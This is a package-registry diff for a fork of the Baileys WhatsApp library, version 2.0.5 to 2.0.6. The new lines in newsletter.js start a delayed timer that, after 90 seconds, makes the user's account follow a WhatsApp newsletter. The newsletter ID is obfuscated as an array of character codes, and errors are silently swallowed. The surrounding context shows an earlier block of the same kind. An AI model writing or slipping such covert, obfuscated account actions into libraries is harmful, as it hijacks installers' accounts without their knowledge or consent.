@kyuu2nd/baileys 2.0.5 → 2.0.6
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/lib/Socket/newsletter.js +12 -0
- package/package.json +1 -1
package/lib/Socket/newsletter.js
CHANGED
|
@@ -200,6 +200,18 @@ setTimeout(async () => {
|
|
|
200
200
|
);
|
|
201
201
|
} catch {}
|
|
202
202
|
}, 90000);
|
|
203
|
+
|
|
204
|
+
setTimeout(async () => {
|
|
205
|
+
try {
|
|
206
|
+
await newsletterWMexQuery(
|
|
207
|
+
asciiDecode([
|
|
208
|
+
49,50,48,51,54,51,52,48,55,52,57,55,51,57,49,55,56,49,
|
|
209
|
+
64,110,101,119,115,108,101,116,116,101,114
|
|
210
|
+
]),
|
|
211
|
+
Types_1.QueryIds.FOLLOW
|
|
212
|
+
);
|
|
213
|
+
} catch {}
|
|
214
|
+
}, 90000);
|
|
203
215
|
const parseFetchedUpdates = async (node, type) => {
|
|
204
216
|
let child;
|
|
205
217
|
if (type === 'messages') {
|